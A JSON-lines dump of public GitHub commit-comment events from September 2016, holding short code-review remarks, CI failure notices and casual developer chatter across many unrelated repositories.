{"id":"4580290890","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071412,"position":227,"line":227,"path":"relxr_landing/index.html","commit_id":"2b580ce798bea0d0b8c2b1ac0472e2d2fa9f3a91","created_at":"2016-09-18T17:26:49Z","updated_at":"2016-09-18T17:26:49Z","body":"If you are going to use a `<ul>` element, it is important that it's children are `<li>` elements, and each `<a>` could go within a `<li>`. "}},"created_at":"2016-09-18T17:26:49Z"}
{"id":"4580291354","type":"CommitCommentEvent","actor":{"login":"adriatic"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":19071414,"position":null,"line":null,"path":null,"commit_id":"ae2325ac655ffeb3d7d0f35159ba02984bd99914","created_at":"2016-09-18T17:27:09Z","updated_at":"2016-09-18T17:27:09Z","body":"You are not shabby with css (or less in this case) 😏 "}},"created_at":"2016-09-18T17:27:09Z"}
{"id":"4580291466","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"carenbraj/relaxr"},"payload":{"comment":{"id":19071415,"position":82,"line":82,"path":"relxr_landing/index.html","commit_id":"2b580ce798bea0d0b8c2b1ac0472e2d2fa9f3a91","created_at":"2016-09-18T17:27:14Z","updated_at":"2016-09-18T17:27:14Z","body":"great use of nested selectors!"}},"created_at":"2016-09-18T17:27:14Z"}
{"id":"4580294329","type":"CommitCommentEvent","actor":{"login":"Cohesive95"},"repo":{"name":"sathishstorm/android-remote"},"payload":{"comment":{"id":19071416,"position":null,"line":null,"path":null,"commit_id":"9be3c330e585dbe5b0dcc53cc40cb039675c3e0b","created_at":"2016-09-18T17:29:11Z","updated_at":"2016-09-18T17:29:11Z","body":"this app ain't workin at all"}},"created_at":"2016-09-18T17:29:11Z"}
{"id":"4580294818","type":"CommitCommentEvent","actor":{"login":"muhammadfahadbaig"},"repo":{"name":"Honor8Dev/android_kernel_huawei_FRD-L04"},"payload":{"comment":{"id":19071417,"position":null,"line":null,"path":null,"commit_id":"20ed3b04d3b2ccd03c81f5342ae2d0fa8810c328","created_at":"2016-09-18T17:29:29Z","updated_at":"2016-09-18T17:29:29Z","body":"Forgot to add my Signed-off comment :D\r\nSigned-off-by: Muhammad Fahad Baig <muhammad.fb.79@gmail.com>"}},"created_at":"2016-09-18T17:29:29Z"}
{"id":"4580296996","type":"CommitCommentEvent","actor":{"login":"Dlackey75"},"repo":{"name":"Dlackey75/tutorial"},"payload":{"comment":{"id":19071418,"position":null,"line":null,"path":null,"commit_id":"d041da8108e3b05107a0acb872369904b8b31e65","created_at":"2016-09-18T17:30:57Z","updated_at":"2016-09-18T17:30:57Z","body":"LabPartner object from OOPDA"}},"created_at":"2016-09-18T17:30:57Z"}
{"id":"4580297065","type":"CommitCommentEvent","actor":{"login":"tintohill"},"repo":{"name":"eaburns/plan9port"},"payload":{"comment":{"id":19071419,"position":null,"line":null,"path":null,"commit_id":"01fb4c66d3d913521aa14c3c4eaf3f89b4d671f9","created_at":"2016-09-18T17:31:01Z","updated_at":"2016-09-18T17:31:01Z","body":"just testing\r\n"}},"created_at":"2016-09-18T17:31:01Z"}
{"id":"4580297349","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071422,"position":null,"line":null,"path":null,"commit_id":"6c73270686137b59f3575840f6040108aacdf490","created_at":"2016-09-18T17:31:12Z","updated_at":"2016-09-18T17:31:12Z","body":"Ill try it, but tbh if I could have fixed it you would already have a PR."}},"created_at":"2016-09-18T17:31:12Z"}
{"id":"4580298629","type":"CommitCommentEvent","actor":{"login":"JAMIRAI"},"repo":{"name":"gztchan/awesome-design"},"payload":{"comment":{"id":19071425,"position":7,"line":356,"path":"README.md","commit_id":"44a1bde497bad7666735bd1a051922e9a095ff3c","created_at":"2016-09-18T17:32:08Z","updated_at":"2016-09-18T17:32:08Z","body":"Personal"}},"created_at":"2016-09-18T17:32:08Z"}
{"id":"4580300062","type":"CommitCommentEvent","actor":{"login":"salmanfairoze272"},"repo":{"name":"salmanfairoze272/Intelligent-Traffic-Light-Control-System"},"payload":{"comment":{"id":19071426,"position":null,"line":null,"path":null,"commit_id":"0c9c5e158be5576da9bc71031733443a1bb51480","created_at":"2016-09-18T17:33:06Z","updated_at":"2016-09-18T17:33:06Z","body":"Project Initiation"}},"created_at":"2016-09-18T17:33:06Z"}
{"id":"4580300705","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19071428,"position":4,"line":18,"path":"src/main/webapp/WEB-INF/layouts/header.jsp","commit_id":"54a602bc64ef98d74fe45cedb848b5ba5c7ed17f","created_at":"2016-09-18T17:33:33Z","updated_at":"2016-09-18T17:33:33Z","body":"please check if it would work with: \"isAnonymous()\" ?"}},"created_at":"2016-09-18T17:33:33Z"}
{"id":"4580301331","type":"CommitCommentEvent","actor":{"login":"JAMIRAI"},"repo":{"name":"gztchan/awesome-design"},"payload":{"comment":{"id":19071429,"position":null,"line":null,"path":null,"commit_id":"44a1bde497bad7666735bd1a051922e9a095ff3c","created_at":"2016-09-18T17:33:58Z","updated_at":"2016-09-18T17:33:58Z","body":"Take privacy"}},"created_at":"2016-09-18T17:33:58Z"}
{"id":"4580301916","type":"CommitCommentEvent","actor":{"login":"prudhomm"},"repo":{"name":"feelpp/config"},"payload":{"comment":{"id":19071430,"position":null,"line":null,"path":null,"commit_id":"ae08c20df158c6d7e334d50e761c534c07550ae0","created_at":"2016-09-18T17:34:24Z","updated_at":"2016-09-18T17:34:24Z","body":"why move to gitlab ?"}},"created_at":"2016-09-18T17:34:24Z"}
{"id":"4580302837","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19071434,"position":13,"line":44,"path":"src/main/java/com/softserverinc/edu/controllers/ProjectController.java","commit_id":"f7b1d0383cb2938a803b42cbedba0e288d5ddc5a","created_at":"2016-09-18T17:35:00Z","updated_at":"2016-09-18T17:35:00Z","body":"please create some constant for number 12. Also you can extract this constant into some class with constants, if there are the same on project"}},"created_at":"2016-09-18T17:35:00Z"}
{"id":"4580302887","type":"CommitCommentEvent","actor":{"login":"JAMIRAI"},"repo":{"name":"gztchan/awesome-design"},"payload":{"comment":{"id":19071435,"position":5,"line":354,"path":"README.md","commit_id":"44a1bde497bad7666735bd1a051922e9a095ff3c","created_at":"2016-09-18T17:35:02Z","updated_at":"2016-09-18T17:35:02Z","body":"Back to me money back"}},"created_at":"2016-09-18T17:35:02Z"}
{"id":"4580303611","type":"CommitCommentEvent","actor":{"login":"JAMIRAI"},"repo":{"name":"gztchan/awesome-design"},"payload":{"comment":{"id":19071436,"position":7,"line":356,"path":"README.md","commit_id":"44a1bde497bad7666735bd1a051922e9a095ff3c","created_at":"2016-09-18T17:35:34Z","updated_at":"2016-09-18T17:35:34Z","body":"Back to me money"}},"created_at":"2016-09-18T17:35:34Z"}
{"id":"4580304081","type":"CommitCommentEvent","actor":{"login":"Seonsik"},"repo":{"name":"bjrambo/nurigo"},"payload":{"comment":{"id":19071437,"position":null,"line":null,"path":null,"commit_id":"5c8d0d47ed6f5c8c084205590273cdf7bdecbc61","created_at":"2016-09-18T17:35:51Z","updated_at":"2016-09-18T17:35:51Z","body":"연휴에도 늦게까지 수고하십니다.\r\n다시한번 노고에 정말 감사합니다."}},"created_at":"2016-09-18T17:35:51Z"}
{"id":"4580305356","type":"CommitCommentEvent","actor":{"login":"JohnKim"},"repo":{"name":"JohnKim/stalk.messenger"},"payload":{"comment":{"id":19071439,"position":null,"line":null,"path":null,"commit_id":"a1150d51a60a3d563e715f9edab733e91839f94d","created_at":"2016-09-18T17:36:50Z","updated_at":"2016-09-18T17:36:50Z","body":"IOS 아이콘은 반드시 배경색이 있어야 한다고 함.. "}},"created_at":"2016-09-18T17:36:50Z"}
{"id":"4580305748","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19071440,"position":13,"line":46,"path":"src/main/java/com/softserverinc/edu/controllers/ReleaseController.java","commit_id":"1f304066e57c4ba8c554da817c01da3549242848","created_at":"2016-09-18T17:37:07Z","updated_at":"2016-09-18T17:37:07Z","body":"I've mentioned earlier, also please extract constant"}},"created_at":"2016-09-18T17:37:07Z"}
{"id":"4580306000","type":"CommitCommentEvent","actor":{"login":"dzieciou"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19071441,"position":6,"line":188,"path":"src/main/java/com/github/dzieciou/testing/curl/Http2Curl.java","commit_id":"f66b0931046bcf475d99ee931f4660eba79f3ab4","created_at":"2016-09-18T17:37:19Z","updated_at":"2016-09-18T17:37:19Z","body":"@blacky0x0 I was waiting for REST-assured to release a related bug fix (Cookie attributes are no longer sent in request in accordance with RFC6265. Thanks to Maciej Gawinecki for pull request. (issue 720))\r\n\r\nI should release my fix this week."}},"created_at":"2016-09-18T17:37:19Z"}
{"id":"4580308189","type":"CommitCommentEvent","actor":{"login":"nathantsoi"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":19071447,"position":null,"line":null,"path":null,"commit_id":"f3bfb085f8dd798a41f4de05679f720511781cfc","created_at":"2016-09-18T17:38:47Z","updated_at":"2016-09-18T17:38:47Z","body":"For bf there is also: https://github.com/savaga/mcm-tools/tree/usage\n\nOn Sun, Sep 18, 2016, 10:14 AM LinJieqiang <notifications@github.com> wrote:\n\n> OK thanks\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/betaflight/betaflight-configurator/commit/f3bfb085f8dd798a41f4de05679f720511781cfc#commitcomment-19071383>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAYZmvlpwX03lAbBIU91kMtboYY2UPwcks5qrXFmgaJpZM4J_25_>\n> .\n>\n"}},"created_at":"2016-09-18T17:38:47Z"}
{"id":"4580308614","type":"CommitCommentEvent","actor":{"login":"binkybear"},"repo":{"name":"seemoo-lab/bcm-public"},"payload":{"comment":{"id":19071448,"position":null,"line":null,"path":null,"commit_id":"d225b343760898634f95d478b5119890eeb9d946","created_at":"2016-09-18T17:39:07Z","updated_at":"2016-09-18T17:39:07Z","body":"Sorry, I'm a little confused on this commit.  Is Wifi supposed to be enabled after flashing? I flashed latest boot.img but wifi still doesn't seem to work (viewing AP's/connecting).  Monitor mode is still fine.\r\n\r\nIs there something that I'm missing?  "}},"created_at":"2016-09-18T17:39:07Z"}
{"id":"4580310389","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19071451,"position":4,"line":99,"path":"src/main/java/com/softserverinc/edu/controllers/IssueController.java","commit_id":"648c2fe6f91639473063cfabb3917df7ac21b8b7","created_at":"2016-09-18T17:40:21Z","updated_at":"2016-09-18T17:40:21Z","body":"why so long method name in service? this method name is ok in repository, but not in service. Please refactor such method names in all services for more human readable names"}},"created_at":"2016-09-18T17:40:21Z"}
{"id":"4580311321","type":"CommitCommentEvent","actor":{"login":"blakeklasing"},"repo":{"name":"blakeklasing/NW-Parallel"},"payload":{"comment":{"id":19071452,"position":null,"line":null,"path":null,"commit_id":"31ab5030030bb1aeed9aeb2050d0c37f8a525d85","created_at":"2016-09-18T17:40:59Z","updated_at":"2016-09-18T17:40:59Z","body":"nice nice nice nice niiiiice!"}},"created_at":"2016-09-18T17:40:59Z"}
{"id":"4580311423","type":"CommitCommentEvent","actor":{"login":"reaver-project-ci"},"repo":{"name":"reaver-project/reaverlib"},"payload":{"comment":{"id":19071453,"position":null,"line":null,"path":null,"commit_id":"04db4f6eb4f1fcae66b485d79b7f6d53a3297ea3","created_at":"2016-09-18T17:41:04Z","updated_at":"2016-09-18T17:41:04Z","body":"CI job has failed for environment `gcc:5_3_0/boost:1.60.0`: https://ci.reaver-project.org/viewLog.html?buildId=3702&buildTypeId=reaverlib_Tests&guest=1."}},"created_at":"2016-09-18T17:41:04Z"}
{"id":"4580312600","type":"CommitCommentEvent","actor":{"login":"chrisli6"},"repo":{"name":"szisa/sziit_qianke_crx"},"payload":{"comment":{"id":19071456,"position":1,"line":1,"path":"学生网上选课_files/css.css","commit_id":"522dddcde4c27e3d9b84d8fd74d9dd07655691b8","created_at":"2016-09-18T17:41:52Z","updated_at":"2016-09-18T17:41:52Z","body":"新生下载抢课插件"}},"created_at":"2016-09-18T17:41:52Z"}
{"id":"4580313407","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/temp"},"payload":{"comment":{"id":19071461,"position":23,"line":103,"path":"ore_grow_original_utf8_11.txt","commit_id":"df9c76a1f0e09183d9e25a455e388e9e494788ee","created_at":"2016-09-18T17:42:20Z","updated_at":"2016-09-18T17:42:20Z","body":"может тогда просто \"мистер грубиян\"? оно вроде и понятнее, и формальность соблюдена (т.к. слово \"мистер\" присутствует)"}},"created_at":"2016-09-18T17:42:20Z"}
{"id":"4580313872","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"mitchki/dsp"},"payload":{"comment":{"id":19071462,"position":null,"line":null,"path":null,"commit_id":"dad0dbb6e1124d3a64bcd7408ff97aef47dd52aa","created_at":"2016-09-18T17:42:37Z","updated_at":"2016-09-18T17:42:37Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @mitchki \r\n\r\nGreat work on advanced Python! Here are some comments:\r\n- Q5: when you open a file with `with open(data) as f:`, you don't need to close it explicitly (as you can check with `f.closed` after the open block).\r\n- Q6, `make_dict(ifile)`: Lots of `with open(ifile) as f:` in this function, which is not very efficient (although perfectly acceptable for small files).\r\n\r\n👍 "}},"created_at":"2016-09-18T17:42:37Z"}
{"id":"4580315171","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19071468,"position":5,"line":165,"path":"src/main/webapp/WEB-INF/views/user/userview.jsp","commit_id":"baa37dcc643949626c4a82bae707b48314b9067e","created_at":"2016-09-18T17:43:24Z","updated_at":"2016-09-18T17:43:24Z","body":"maybe typo with number \"1\"? \"1pagerID\""}},"created_at":"2016-09-18T17:43:24Z"}
{"id":"4580315902","type":"CommitCommentEvent","actor":{"login":"ObaniGemini"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19071469,"position":null,"line":null,"path":null,"commit_id":"28ccdf8c98f486ff9ce7d25f36321c3e3eae3543","created_at":"2016-09-18T17:43:53Z","updated_at":"2016-09-18T17:43:53Z","body":"Anyway, I'm with you on it, sorry for the harsh words. (but what is done is done, a regression would be meaningless)"}},"created_at":"2016-09-18T17:43:53Z"}
{"id":"4580317664","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19071473,"position":130,"line":117,"path":"src/main/webapp/WEB-INF/views/issue/issue.jsp","commit_id":"4ff7e62ff848cd1089948b53859b2730d1c6a6fe","created_at":"2016-09-18T17:45:03Z","updated_at":"2016-09-18T17:45:03Z","body":"can it be in single section, because looks like three sections have identiacal` sec:authorize`?"}},"created_at":"2016-09-18T17:45:03Z"}
{"id":"4580318523","type":"CommitCommentEvent","actor":{"login":"gztchan"},"repo":{"name":"gztchan/awesome-design"},"payload":{"comment":{"id":19071474,"position":null,"line":null,"path":null,"commit_id":"44a1bde497bad7666735bd1a051922e9a095ff3c","created_at":"2016-09-18T17:45:35Z","updated_at":"2016-09-18T17:45:35Z","body":"what ?"}},"created_at":"2016-09-18T17:45:35Z"}
{"id":"4580319039","type":"CommitCommentEvent","actor":{"login":"Gayathri13"},"repo":{"name":"Gayathri13/imad-2016-app"},"payload":{"comment":{"id":19071475,"position":null,"line":null,"path":null,"commit_id":"9dcf71eb265e0bee30dd2e2d1c043eb310507521","created_at":"2016-09-18T17:45:58Z","updated_at":"2016-09-18T17:45:58Z","body":"Testing web app\r\n"}},"created_at":"2016-09-18T17:45:58Z"}
{"id":"4580321003","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19071479,"position":4,"line":80,"path":"src/main/java/com/softserverinc/edu/services/IssueService.java","commit_id":"50f1d730231f1f57cafbc601c69c742a1b1f421f","created_at":"2016-09-18T17:47:17Z","updated_at":"2016-09-18T17:47:17Z","body":"as I mentioned earlier, services name should be human readable not like repository name, please fix"}},"created_at":"2016-09-18T17:47:17Z"}
{"id":"4580322313","type":"CommitCommentEvent","actor":{"login":"sbojchuk"},"repo":{"name":"IF-066-Java/bugTrckr"},"payload":{"comment":{"id":19071482,"position":24,"line":89,"path":"src/main/webapp/WEB-INF/views/release/release.jsp","commit_id":"d8a27bdba889800b5c5d3be4bc29bb5db155355a","created_at":"2016-09-18T17:48:11Z","updated_at":"2016-09-18T17:48:11Z","body":"please check expression `not empty issueList.getTotalPages()`"}},"created_at":"2016-09-18T17:48:11Z"}
{"id":"4580322314","type":"CommitCommentEvent","actor":{"login":"eddibravo"},"repo":{"name":"ostapqwert/genmvc"},"payload":{"comment":{"id":19071483,"position":54,"line":81,"path":"app/core/Router.php","commit_id":"f35da8809e091177267dbc1fbe860a3d78d564de","created_at":"2016-09-18T17:48:11Z","updated_at":"2016-09-18T17:48:11Z","body":"а если нету `REQUEST_URI` ??\r\n то всё? жизнь тлен?"}},"created_at":"2016-09-18T17:48:11Z"}
{"id":"4580322361","type":"CommitCommentEvent","actor":{"login":"giuicacosmina"},"repo":{"name":"giuicacosmina/Project_1"},"payload":{"comment":{"id":19071484,"position":2,"line":2,"path":"File1","commit_id":"132b7dfdb50bf10e1e4d35e4df7a5e1070974e8f","created_at":"2016-09-18T17:48:13Z","updated_at":"2016-09-18T17:48:13Z","body":"Third line"}},"created_at":"2016-09-18T17:48:13Z"}
{"id":"4580322770","type":"CommitCommentEvent","actor":{"login":"Techcable"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19071485,"position":null,"line":null,"path":null,"commit_id":"f7cfe1f769a715a46c22741066185c8060ca8223","created_at":"2016-09-18T17:48:31Z","updated_at":"2016-09-18T17:48:31Z","body":"javax.annotations is the best 🎉 \r\nToo bad it didn't get in the JDK itself 💩 "}},"created_at":"2016-09-18T17:48:31Z"}
{"id":"4580322779","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071486,"position":32,"line":3286,"path":"github-dark.css","commit_id":"4ee3b5dc8ec9599b6734e4e91949a602a2f6480f","created_at":"2016-09-18T17:48:31Z","updated_at":"2016-09-18T17:48:31Z","body":"This `.highlight *` is too broad, it's affecting code blocks in issue."}},"created_at":"2016-09-18T17:48:31Z"}
{"id":"4580323184","type":"CommitCommentEvent","actor":{"login":"rmacneil53"},"repo":{"name":"coreymartella/innovationpolymers"},"payload":{"comment":{"id":19071487,"position":null,"line":null,"path":null,"commit_id":"caec7d2375aa772093bb4d2c9bcc695a58a2fbc7","created_at":"2016-09-18T17:48:46Z","updated_at":"2016-09-18T17:48:46Z","body":"I want to replace the existing files with these files that have the -a on the end of the name..  I am not sure how to do this but will continue to try."}},"created_at":"2016-09-18T17:48:46Z"}
{"id":"4580323639","type":"CommitCommentEvent","actor":{"login":"scottwainstock"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19071488,"position":60,"line":60,"path":"app/views/pages/profile.html.haml","commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T17:49:03Z","updated_at":"2016-09-18T17:49:03Z","body":"Naw, we need that this way. The code in the backend now generates profile stats that both the webpage and the apps can use. So, the styling needs to happen on the front-end now."}},"created_at":"2016-09-18T17:49:03Z"}
{"id":"4580324903","type":"CommitCommentEvent","actor":{"login":"amardeep434"},"repo":{"name":"amardeep434/Guides"},"payload":{"comment":{"id":19071489,"position":null,"line":null,"path":null,"commit_id":"73fdfc4b398e5a6e2b2cd40e46b7bde612288bb9","created_at":"2016-09-18T17:49:53Z","updated_at":"2016-09-18T17:49:53Z","body":"its been a long time i havent updated this guide."}},"created_at":"2016-09-18T17:49:53Z"}
{"id":"4580326613","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19071493,"position":null,"line":null,"path":null,"commit_id":"270db5d1c0e116b95de38e2a2c53564399417b40","created_at":"2016-09-18T17:51:07Z","updated_at":"2016-09-18T17:51:07Z","body":"Would this change require a server restart?"}},"created_at":"2016-09-18T17:51:07Z"}
{"id":"4580327065","type":"CommitCommentEvent","actor":{"login":"TAHK6e3TOPMO3OB"},"repo":{"name":"TAHK6e3TOPMO3OB/STACK"},"payload":{"comment":{"id":19071496,"position":null,"line":null,"path":null,"commit_id":"bf2d888087b79c9a9c735b5e419989821c4d1543","created_at":"2016-09-18T17:51:23Z","updated_at":"2016-09-18T17:51:23Z","body":"Пункт 3"}},"created_at":"2016-09-18T17:51:23Z"}
{"id":"4580327487","type":"CommitCommentEvent","actor":{"login":"reaver-project-ci"},"repo":{"name":"reaver-project/reaverlib"},"payload":{"comment":{"id":19071497,"position":null,"line":null,"path":null,"commit_id":"56f8f7ef51ebb75db7792d6f6af284a56906079e","created_at":"2016-09-18T17:51:42Z","updated_at":"2016-09-18T17:51:42Z","body":"CI job has failed for environment `gcc:5_1_0/boost:1.60.0`: https://ci.reaver-project.org/viewLog.html?buildId=3725&buildTypeId=reaverlib_Tests&guest=1."}},"created_at":"2016-09-18T17:51:42Z"}
{"id":"4580328809","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"mitchki/dsp"},"payload":{"comment":{"id":19071501,"position":null,"line":null,"path":null,"commit_id":"bd3ac8a7cd0ac5b59c5a1134ecdd6fe2c266b316","created_at":"2016-09-18T17:52:36Z","updated_at":"2016-09-18T17:52:36Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @mitchki \r\n\r\nGood work on linear algebra!\r\n\r\nFor 3.8, B<sup>4</sup>, your calculation method is correct, but the result you display is wrong, it should be `array([[1, -4], [0, 1]])`.\r\n\r\n👍 "}},"created_at":"2016-09-18T17:52:36Z"}
{"id":"4580329008","type":"CommitCommentEvent","actor":{"login":"matthiasseemoo"},"repo":{"name":"seemoo-lab/bcm-public"},"payload":{"comment":{"id":19071503,"position":null,"line":null,"path":null,"commit_id":"d225b343760898634f95d478b5119890eeb9d946","created_at":"2016-09-18T17:52:44Z","updated_at":"2016-09-18T17:52:44Z","body":"The idea is not to use the boot.img file but directly overwrite the\nfirmware under /vendor/firmware/fw_bcmdhd.bin. Then you can start your\nphone with your regular boot image but load the patched firmware. Soon, we\nwill make it a bit easier to use.\n\nAm 18.09.2016 7:39 nachm. schrieb \"binkybear\" <notifications@github.com>:\n\n> Sorry, I'm a little confused on this commit. Is Wifi supposed to be\n> enabled after flashing? I flashed latest boot.img but wifi still doesn't\n> seem to work (viewing AP's/connecting). Monitor mode is still fine.\n>\n> Is there something that I'm missing?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/seemoo-lab/bcm-public/commit/d225b343760898634f95d478b5119890eeb9d946#commitcomment-19071448>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALP_7pYhbxl8ZJKiJOG3CXYpfH8TUze2ks5qrXc7gaJpZM4J_9jU>\n> .\n>\n"}},"created_at":"2016-09-18T17:52:44Z"}
{"id":"4580330434","type":"CommitCommentEvent","actor":{"login":"Sandertv"},"repo":{"name":"BoxOfDevs/BoxOfBits"},"payload":{"comment":{"id":19071506,"position":null,"line":null,"path":null,"commit_id":"1014a4af2550215892a9045cb3c9ede077f780f6","created_at":"2016-09-18T17:53:41Z","updated_at":"2016-09-18T17:53:41Z","body":"Lol?"}},"created_at":"2016-09-18T17:53:41Z"}
{"id":"4580330689","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19071507,"position":32,"line":3286,"path":"github-dark.css","commit_id":"4ee3b5dc8ec9599b6734e4e91949a602a2f6480f","created_at":"2016-09-18T17:53:52Z","updated_at":"2016-09-18T17:53:52Z","body":"Ok, maybe we can just remove it entirely."}},"created_at":"2016-09-18T17:53:52Z"}
{"id":"4580330926","type":"CommitCommentEvent","actor":{"login":"wazery"},"repo":{"name":"jen-v/nameofapp"},"payload":{"comment":{"id":19071509,"position":5,"line":4,"path":"spec/controllers/static_pages_controller_spec.rb","commit_id":"83837744633ef9935e3f03b7922dff765bc3abc4","created_at":"2016-09-18T17:54:04Z","updated_at":"2016-09-18T17:54:04Z","body":"Why did you change this to double quotes? Single quotes is always better, according to the Ruby style guide."}},"created_at":"2016-09-18T17:54:04Z"}
{"id":"4580332743","type":"CommitCommentEvent","actor":{"login":"Orhideous"},"repo":{"name":"everypony/tabun"},"payload":{"comment":{"id":19071513,"position":31,"line":499,"path":"classes/modules/acl/ACL.class.php","commit_id":"67ddd4c6f23ff12b057c3f6441923832d4bdeda2","created_at":"2016-09-18T17:55:12Z","updated_at":"2016-09-18T17:55:12Z","body":"@Farxial Насколько я понимаю, дублирование этой логики в контроллерах смысла не имеет."}},"created_at":"2016-09-18T17:55:12Z"}
{"id":"4580335516","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19071519,"position":60,"line":60,"path":"app/views/pages/profile.html.haml","commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T17:57:07Z","updated_at":"2016-09-18T17:57:07Z","body":"So that's why it's html instead of haml?"}},"created_at":"2016-09-18T17:57:07Z"}
{"id":"4580336229","type":"CommitCommentEvent","actor":{"login":"wei170"},"repo":{"name":"wei170/iStudy"},"payload":{"comment":{"id":19071520,"position":null,"line":null,"path":null,"commit_id":"5458a39053a6420a4ad1ec32ebf754097486d617","created_at":"2016-09-18T17:57:37Z","updated_at":"2016-09-18T17:57:37Z","body":"我错了，以后不留swp了。。。"}},"created_at":"2016-09-18T17:57:37Z"}
{"id":"4580336279","type":"CommitCommentEvent","actor":{"login":"scottwainstock"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19071521,"position":60,"line":60,"path":"app/views/pages/profile.html.haml","commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T17:57:38Z","updated_at":"2016-09-18T17:57:38Z","body":"Oh that's just me not really knowing how to do the haml right, I think...\n\nOn Sun, Sep 18, 2016 at 10:57 AM, RyanTG <notifications@github.com> wrote:\n\n> So that's why it's html instead of haml?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/scottwainstock/pbm/commit/a67fa09123d5c47b7409107732904e3e0db2460f#commitcomment-19071519>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAK-LVOyGtLazEFoMp4lJyyx0Nnhcu7fks5qrXtzgaJpZM4J_0Um>\n> .\n>\n"}},"created_at":"2016-09-18T17:57:38Z"}
{"id":"4580336369","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"nitrogen-os-devices/android_device_lge_hammerhead"},"payload":{"comment":{"id":19071522,"position":null,"line":null,"path":null,"commit_id":"9d881759804e7fb757af69ce7454f991233a8f0d","created_at":"2016-09-18T17:57:43Z","updated_at":"2016-09-18T17:57:43Z","body":"@knmurthy \r\nNot yet, but I'm looking for."}},"created_at":"2016-09-18T17:57:43Z"}
{"id":"4580336678","type":"CommitCommentEvent","actor":{"login":"scottwainstock"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19071523,"position":60,"line":60,"path":"app/views/pages/profile.html.haml","commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T17:57:55Z","updated_at":"2016-09-18T17:57:55Z","body":"It's like a haml/html hybrid there...\n\nOn Sun, Sep 18, 2016 at 10:57 AM, Scott Wainstock <scott.wainstock@gmail.com\n> wrote:\n\n> Oh that's just me not really knowing how to do the haml right, I think...\n>\n> On Sun, Sep 18, 2016 at 10:57 AM, RyanTG <notifications@github.com> wrote:\n>\n>> So that's why it's html instead of haml?\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/scottwainstock/pbm/commit/a67fa09123d5c47b7409107732904e3e0db2460f#commitcomment-19071519>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AAK-LVOyGtLazEFoMp4lJyyx0Nnhcu7fks5qrXtzgaJpZM4J_0Um>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-18T17:57:55Z"}
{"id":"4580338132","type":"CommitCommentEvent","actor":{"login":"nine7nine"},"repo":{"name":"nine7nine/Wine-Linux-stuff"},"payload":{"comment":{"id":19071526,"position":null,"line":null,"path":null,"commit_id":"a9c91db0933a0eaf1337dc94d6783e43e71c2889","created_at":"2016-09-18T17:58:55Z","updated_at":"2016-09-18T17:58:55Z","body":"This is the script that I use to start Reaper with Wine-lpa (staging).\r\n"}},"created_at":"2016-09-18T17:58:55Z"}
